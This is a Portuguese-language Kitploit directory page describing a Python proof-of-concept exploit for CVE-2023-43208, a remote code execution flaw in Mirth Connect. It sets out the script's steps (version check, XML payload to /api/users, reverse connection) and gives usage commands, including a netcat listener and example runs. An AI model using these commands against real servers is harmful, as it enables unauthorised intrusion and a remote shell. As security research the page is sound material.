Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-43208 — PoC para exploração de RCE da CVE-2023-43208. | Kitploit
Ferramentas/GitHubGitHub/predyy/cve-2023-43208
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubpredyy/cve-2023-43208

CVE-2023-43208

PoC para exploração de RCE da CVE-2023-43208.

Ver Repositório
11há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-43208 Mirth Connect RCE PoC

Script Python de prova de conceito visando CVE-2023-43208 no Mirth Connect.

Aviso legal

Use apenas em ambientes que você possui ou para os quais tem autorização explícita para testar. Este repositório destina-se à pesquisa, validação e testes defensivos de segurança. O autor não se responsabiliza por qualquer uso indevido ou dano causado por esta ferramenta.

Visão geral

exp.py é uma versão de dependência mínima do PoC que:

  • Detecta se um alvo aparenta ser uma instância do Mirth Connect
  • Solicita a versão do Mirth Connect a partir de /api/server/version
  • Verifica se a versão é inferior a 4.4.1
  • Envia um payload XML para /api/users se o alvo parecer vulnerável

O script usa HTTPS por padrão e pode ser alternado para HTTP com --http.

Uso

Baixar ferramenta
root@kitploit:~
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]

Argumentos

  • -u, --url: URL ou host do Mirth Connect alvo
  • -lh, --lhost: Host/IP local para a conexão reversa
  • -lp, --lport: Porta local de escuta
  • --http: Força HTTP em vez de HTTPS (o padrão é HTTPS)

Exemplo

Inicie um listener primeiro:

root@kitploit:~
nc -lvnp 4444

Execute o script:

root@kitploit:~
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444

Para um alvo somente HTTP:

root@kitploit:~
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http

Notas

  • A verificação do certificado SSL está desabilitada no script.
  • O script solicita confirmação antes de enviar o payload.
  • A detecção de versão baseia-se na comparação semântica com 4.4.1.
  • Não é garantido que um alvo detectado como Mirth Connect seja explorável (diferenças de rede, ambiente e runtime podem afetar os resultados).

Créditos

  • Descoberta original da vulnerabilidade: IHTeam
  • Código original: K3ysTr0K3R e Chocapikk
  • Versão de dependência mínima: predyy